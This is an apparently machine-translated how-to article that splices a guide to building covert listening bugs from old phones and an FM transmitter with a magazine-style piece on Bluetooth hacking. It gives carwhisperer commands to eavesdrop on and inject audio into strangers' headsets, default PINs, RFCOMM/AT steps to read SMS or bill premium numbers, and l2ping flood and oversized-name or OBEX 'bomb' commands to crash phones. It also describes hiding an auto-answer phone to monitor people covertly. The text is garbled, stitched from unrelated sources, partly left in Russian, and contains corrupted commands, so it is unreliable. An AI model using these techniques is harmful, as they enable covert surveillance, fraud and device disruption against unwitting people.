Useful Tips

How to make a bug with your own hands: diagram and detailed description


If necessary, to listen to a conversation on the phone it is not at all necessary to put a bug in your pocket or connect a listening device. Just a victim’s mobile phone is enough.

At the right time, your phone will dial a certain number on its own and imperceptibly, and an interested attacker will be able to listen to your conversation until he hangs up.

And if the mobile phone is near you, you can rest assured that the conversation will not only be heard, but also recorded. And the distance from you to the place of wiretapping does not matter.

By the way, in the phone, in outgoing calls, there will be no trace of the “left” call, and you will not be able to find out that you were eavesdropped. Hard to believe? Alas, this is so. Although not all cell phones can be used by scammers as wiretapping.

There is a segment of consumers who prefer business-class smartphones. This type of device is distinguished by its wide capabilities and attractive design, but at the same time, this smartphone also has many vulnerabilities. Using these vulnerabilities, an interested person can make a wiretap controlled by him from your smartphone, and you will not even know about it.

And even if an attacker is on the other side of the globe, he will be quite capable of initializing a call to listen to your cell phone. And stealing the phone of the “victim” in order to install the “bug” is not necessary at all - some phone brands allow you to call them remotely without pressing any buttons on the device and even (!) Without knowing the number.

Legal grounds

Of course, you need to understand that special equipment for listening is the prerogative of the special services. In case of violation of the constitutional rights of the individual and proven guilt in the infringement of the secret of private life, administrative punishment will follow. There are frequent cases when it comes to criminal liability. Therefore, do not "abuse" the manufactured product. It is much wiser to use such a device as an additional means of security or use it to exercise acoustic control over the territory of your own home. For example, a self-made bug for wiretapping will become an excellent “informant” if you are not sure of the decency of the nanny you hired or want to know what is happening in the classroom. Yes, you never know the situations in life when the use of listening devices becomes a necessity.

The content of the article

Everyone knows that with Bluetooth You can transfer a file from device to device or connect a wireless headset. But this is not limited to its capabilities. Having the right tool with you can do real miracles. So why not try yourself as a magician?

Built-in Technology Module Bluetooth (or, more formally, IEEE 802.15.3) has long ceased to be a curiosity. The cost of the module is so scanty that it is not built into a mobile, laptop or PDA by a lazy manufacturer. And even that - for marketing reasons. In a word Bluetooth use almost everything. But only a few know that, using technology, they risk issuing their confidential data. But let's start with the good!

Mobile GSM bug: an incredibly simple solution

In order to make a listening device from a cell phone, you need a device that supports the function "Auto Pick Up", you also need a headset (headphones). The Nokia 1280 device can be considered the most acceptable for such purposes, since the simplicity and reliability of the phone can count on the success of the ongoing project. By the way, the black-and-white screen is a sign of profitability, the energy consumption of the device is significantly reduced. Believe me, such a bug from the phone, tuned with your own hands, is an excellent substitute for expensive listening equipment. Moreover, to perform simple actions described below, literally everyone can do it. Let's get started.

  • Go to the phone menu and enter the “Call mode” section.
  • Create your own personal mode. All items relating to the light indication, vibration, volume of the signal melody, screen saver, sound accompaniment for pressing buttons and notification of an incoming SMS message need to be deactivated.
  • Give a name to the new mode.
  • Through the main menu, find the “Accessories Setup” section, which usually has two sub-items “headset” and “hearing aid”. In each of them, it is necessary to edit the operating parameters and the question of how to make a bug will be practically resolved.
  • All "accessory" items must be included. Set the newly created mode active and exit the settings.
  • Cut off the cord from the headphones and insert the plug into the headset jack.
  • The display should show the activated mode.

Trick 1: Using BT to remotely access a computer

Somehow, for a presentation, I invited one long-legged girlfriend - press the space bar to scroll through the slides in Power Point. This pleasure cost me an expensive lunch and two hours of empty talk with Barbie girl. After that, I firmly decided: next time I’ll go around the problem of the lack of a remote control differently. And he walked around using his mobile phone! Yes, yes, right from the phone you can flip through slides, control music - and God knows what else to do. The main thing is that BT-modules are installed on the mobile phone and computer. Not only will you save money and effort, you will also look inexcusably fashionable. To show such a trick is able to anyone who zauzayet utility
Bluetooth remote control
, not so long ago updated to version 3.0. It allows you to control your computer from the screen of any mobile phone. Everything is very simple. A special server part is installed on the computer, and a client program written in Java is installed on the phone (MIDP 2.0 is required). After setting up a simple scheme, you can remotely control the mouse and keyboard of the computer. And most importantly, you will gain access to the remote desktop. Real Remote Desktop right from your mobile phone screen! Well, with a long-legged girlfriend, time can be spent much more successfully. Bluetooth remote control come in handy here: to put
romantic music :).

We use the smartphone for other purposes

When leaving on a business trip or vacation, you can leave a kind of watchman, so to speak, a mobile "guard" at home. And you don’t need to solder anything, and the cell bug is a reworked smartphone with your own hands. Everything else is just primitive.

  • Almost all smartphones are equipped with the function "Auto-accept calls."
  • In relatively new cellular units, energy-saving mode technology is implemented. Therefore, when you take into account the obviously healthy state of the device, you can count on 5-7 days of operation of your battery.
  • A variant is possible when the phone is connected to the charger, and a special device with a time relay acts as an intermediary between the outlet and the charger. An hour a day is a perfectly acceptable power-up mode (given the situation described above).
  • Turn off the sound notification, light indication and vibration mode in the phone.
  • Such an action as installing headphones into the headset jack will not be superfluous, since the sound background around the caller will be an unfavorable signal that will determine the location of the spy device.
  • Place the device in the middle area of ​​the living space. Do not forget: the device should not be in a conspicuous place, but also a wardrobe is not a solution. Place the phone on the mezzanine or secure on the back of the hanging picture.

Trick 2: Access Control with BT

If you work in a room where a dozen colleagues are sitting with you, you probably had to lock your computer when you leave for another room. And what? Do not have time to move away, as someone already rummages on your hard. The layout is not the most pleasant. In general, you need to lock the computer, the question is - how? You can use the standard features of Windows and enter a long password ten times a day. Or do it beautifully with technology Bluetooth. Everything is as simple as two and two. You move away from the computer - and it is immediately blocked. You come back - and Loka as it happened! The only condition: the module must be installed on both the computer and the mobile phone
Bluetooth, and the program is installed in the system LockItNow (you can easily write such a program yourself, we had a whole article). However, friends and colleagues can talk about telepathic possibilities, and then sell the secret for money :). By the way, if you don’t have a BT module at hand, you can replace it with a phone that supports the “blue tooth” (plug in via the COM port).

Bug for wiretapping: do it yourself from "improvised means"

As a rule, old phones are not thrown away. Find the long-forgotten “electronic comrade”, because it is from him that you will make an effective sound pickup device. It is worth noting that almost any phone can be converted into a listening device. However, dimensions play an important role in "espionage life." Therefore, in such a delicate matter as wiretapping, it is more advisable to use small phone models.

Trick 3: We remove BT traffic from the air

Mastery begins with understanding. Have you ever had a desire to look inside the protocol and find out how data is exchanged through the “blue tooth”? Listening to Bluetooth Traffic can only be performed "in itself", that is, it intercepts the outgoing and incoming traffic of the node on which you gave the command. In this matter, the so-called Host Controller Interface (HCI), which allows you to access the transmitter, is of no small importance. The HCI node usually connects to the device driver node Bluetooth (inbound stream) and to the L2CAP node (outbound stream). Windows platform by default does not provide such an opportunity. However, third-party developers have released
special drivers that allow translate standard dongle into sniffer. Work is traditionally indicative in this regard. FTS4BT Wireless Bluetooth Protocol Analyzerstanding crazy money. The product catches up with the fact that it supports the new Bluetooth v2.0 + EDRon the basis of which modern devices work and, moreover, it is able to decode all traffic from the air on the fly, accurately sorting audio, application protocol data and much more. It is clear that for diving (and indeed) the most relevant USB dongles are class 1, the radius of which reaches one hundred meters.

General flowchart

  • Disassemble the phone.
  • Take a screen and delete all the LEDs (keyboard backlight - leave one for visual control).
  • Solder the power button.
  • Carry out the installation of the device - “Call auto-reception”, because the bug with your “hands” must pick up the phone.
  • Replace the microphone with a more sensitive one (electret).
  • Increase the antenna (ordinary copper wire 15-20 cm).
  • Solder the battery and fix it on top of the keyboard pad (elastic, tape).
  • Check the performance.

The optocoupler shown in the diagram can be replaced by a KT315 type transistor or Western analogs C9018, C9014. In this case, the capacitor is removed, and the resistor is set with a resistance value of 2.2 k.

Trick 4: working with the BT adapter directly

For a long time Bluetooth stacks for Windows provided such meager opportunitiesthat programmers simply bypassed this platform. This explains that most of the programs for serious fun with a “blue tooth” are developed for the Niks platform. We will analyze some of the tricks on this platform, namely Freebsd (I remind you that on the disk of the previous issue we uploaded the latest 7.0 release of this OS). Technology itself Bluetooth officially began to be supported on it only from the 5th branch based on the Netgraph subsystem. I am glad that most USB adapters are compatible with the ng_ubt driver (it must be installed before connecting the device). Will we try?

  1. We connect the device: kldload ng_ubt
  2. Copy the stack loading script to a convenient place: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
  3. Copy the stack loading script to a convenient place and run: sh /usr/local/etc/rc.bluetoots start ubt0

Now I want to introduce you to the hccontrol utility. This is one of the main programs for working with the BT-module. It is she who performs all the operations related to the HCI interface and has the following syntax: hccontrol –n. Let's check the functionality of our device, scan the ether for the presence of devices:

hccontrol –n ubt0hci Inquiry

As a result, the utility will display information about the devices found, including their MAC addresses. It should be noted that each of the Bluetooth devices, whether it’s a headset or an ordinary phone, represents a certain set of services. The basic list includes: CIP (Common ISDN Access), CTP (Cordless Telephony), DUN (dial-up networking), FAX (FAX), FTRN (Obex File Transwer), HSET (Headset), NAP (Network Access Point) . To find out what services a particular device provides, a request is used on a special SPD protocol (Service Descovery Protocol). The SPD server runs directly on the host machine and is exclusively an information component (affect it
impossible). You can determine which services the found devices provide, using the appropriate utility:

# spdcontrol -a browse

Trick 5: Find hidden devices

So, we scanned the broadcast and even found out what services are available on active devices. But here's the catch! Some devices do not give out their presence in any way, since they are in the “Undiscoverable mode” mode and do not respond to broadcast requests. By the settings of your phone, you probably know about a similar security option. However you can still detect such devices!

The most famous technique for detecting them is stupid search of MAC addresses, that is, sequential sending of requests to different addresses from a certain range. To do this, you need to use a very simple utility Redfang, which iterates over the last six bytes of the device address and thus detects hidden devices.

Another option is to use passive techniques: put your device into standby mode, while assigning an attractive name to the network:

hciconfig hci0 name BT_YANDEX
hciconfig hci0 down
hciconfig hci0 up
hcidump -V | grep bdaddr

As a result, all incoming connections will be displayed, among which comrades with hidden identifiers can easily be.

Trick 6: Intercepting headset conversations from the air

One of the main threats of radio technology is that data can be intercepted. The first thing that comes to mind with regards to Bluetooth is listen to the conversations of people using the headset. And often this is real! At the hacker festival What the hack in the Netherlands, experts from the Trifinite group demonstrated how using a laptop with Linux, a special program and a directional antenna eavesdrop on what the driver is talking through the bluetooth headset passing car. The group has developed a program Car whisperer ("The Automobile Whisperer"). The program’s capabilities are relatively small: you can listen only to those who forgot to change the factory Bluetooth access passwords like
“0000” or “1234”. But believe me, there are a lot of such poor fellow! "Sheptun" is able to wedge and successfully pass the "pairing" of devices, receiving information transmitted from the karkit or headset to the mobile phone. I want to pay attention: the utility allows you not only to get the information transmitted between the headset and the mobile, but also to inject your own there. We decided to test the capabilities of this program by downloading Car whisperer from the developers site.

Before starting the operation, it is recommended to change the class of your device, especially if the program will be used from a computer:

hciconfig adapter class 0x500204
# 0x500204 is the class "phone"

Otherwise, some “smart” devices may suspect something was wrong. We look at the utility syntax, which looks like this:

./carwhisperer "what we embed in the line" "what we capture from the line" "device address" [channel]

We took the embedded file directly from the utility folder, and out.raw was specified as the output:

./carwhisperer 0 message.raw /tmp/out.raw
00: 15: 0E: 91: 19: 73

The output is the file out.raw. You cannot listen to it in its pure form: you need to convert it to audio format, which requires an additional utility. Quite a lot of audio converters will do, for example, SoX:

raw –r 8000 –c 1 –s –w out.raw –t wav –r
44100 –c 2 out.wav

In addition to listening, you can log in, view the phone book and take advantage of other “hands-free” features with Bluetooth. The principle is this: first, the active devices are searched and checked for the HS (Head Set) service. Next, the MAC address of the device is examined and an attempt is made to connect using a standard key. If the connection is established, then with the device you can do anything you want (within the available set of AT-commands).

In practice, this is as follows. First, a search is made for all active headsets using the “sdptool search HS” command, which displays something like this:

Searching for HS on 00: 0A: 3A: 54: 71: 95.
Service Name: Headset
Service RecHandle: 0x10009
Service Class ID List:
"Headset" (0x1108)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Далее осуществляется попытка открыть RFCOMM соединение на SCO audio channel с помощью команды «rfcomm connect 2 00:0A:3A:54:71:95 1» и посылка нужных AT-команд. Приведу небольшую статистическую заметку о данных авторизации на некоторые модели беспроводных гарнитур:

Nokia (00:02:EE. ) - pin="5475"
Audi UHV (00:0E:9F. ) - pin="1234"
O'Neill (00:80:37. ) - pin="8761"
Cellink (00:0A:94. ) - pin="1234"
Eazix (00:0C:84. ) - pin="1234"

Кстати говоря, тот же принцип может использоваться для несанкционированного подключения и ко всем остальным устройствам. При помощи AT-команд и протокола RFCOMM можно, к примеру, прочитать SMS-сообщение или даже отправить его с чужого телефона на платный номер, поставив владельца девайса на деньги. Будь бдителен!

Trick 7: DDoS BT devices

The approach is traditional. DDoS is really possible when the host device (“master”) does work many times superior to the client. This situation is called a Denial Of Service attack. It can hang the phone or cause the battery to drain quickly. There are several ways to carry out an attack. Let's start with standard tools. The most obvious thing is to ping the device with large packets. This can be done by specifying the flag l2ping as the parameter “-s”:

# l2ping -s 10000 -b "MAC address"

The program itself, as you already understood, is a relative of ping in a bluetooth environment and serves to check the connection and the presence of a connection. Another method, which is fundamentally different from the first, is to use the “fuzzing” technique - a kind of lottery technique, because it is not known in advance what will happen. This is a new trend in identifying vulnerabilities in products without source code analysis. The technique relies only on interactive communication with the object in a language that is understandable to him, but with absolutely chaotic arguments and variable values. The hacker task will be to make the visible name of the phone consist of a sufficiently large number of elements. Upon detection by its "master" in 70%
In cases of overflow or denial of service:

hciconfig hci0 name `perl -e 'print" ash "x 3137``
# Team for Linux
hccontrol –n adapter change_local_name “new name”)
# example for FreeBSD

Many phones still cannot digest bomb files. Here is a simple implementation of this technique.

  1. First prepare the "bomb." Well-known example:
    echo `perl -e 'print" skvz "x 3137``> file
  2. Then they use a modified utility for interacting with OBEX - USSP PUSH (
    ./obextool push file 00: 0A: 3A: 54: 71: 95 `perl -e 'print" skvz "x 3137`` 3

Full article
read in the April issue of the Hacker!
On our disk you will find the full versions of the programs described in the article, as well as a full selection of Bluetooth documentation and vulnerabilities in this technology.

Is it possible to defend against attack by intruders

Is it possible to listen to the conversation on a cell phone. Alas, there is no quality protection. At the same time, it should be noted that not all phones are affected by this vulnerability - for some models the headset must be authenticated.

One option is to apply a patch that closes such a “hole” in telephone firmware.

And during an important confidential conversation, the phone should be turned off. Better yet, use wiretap suppressors.

Technical Support Team LeaderZakharov Vladimir

Miniature bug

With your own hands you can make an FM transmitter. A fairly simple circuit will allow you to receive a signal in the radio frequency range 88-92 MHz. You should not immediately run to the store and buy parts, perhaps you have faulty electrical equipment, from the board of which you can dismantle the necessary components.

  • Bipolar transistor - 2N3904 or its analog.
  • Resistors - 4.7 and 330 kOhm.
  • Capacitors - 4.7 pF, 1 and 22 nF.
  • 30 pF trimmer capacitor.
  • Contour coil - winding diameter 6 mm, eight-turn, wire 0.5 mm.
  • The material for the board is foil fiberglass.
  • Battery type "Krona" at 9 watts.
  • Electret microphone (the most sensitive is used in tape recorders).

Putting an FM bug to wiretap

  • First, the tuning capacitor is soldered (the middle of the board). The transistor is mounted on the left.
  • Moving to the bottom, we install (from left to right) capacitors: the first - 4.7 pF, the second - 1 nF.
  • Now solder the resistors.
  • After - a 22 nF capacitor and a frameless coil.
  • The wire - antenna, microphone installation and battery soldering completes the design.

In conclusion

Now it’s not a secret for you how to make a bug out of your phone and what is needed for this. The options for GSM and radio products presented in this information review are just a part of the many available electronic samples, through which you can establish high-quality acoustic control. Nevertheless, it should be noted that practicality and quality are achieved through the application of the above recommendations. However, perhaps there is a “craftsman” who will come up with a more rational way to realize the excellent performance of his listening inventions. In the meantime, we will use what we have. Listen carefully!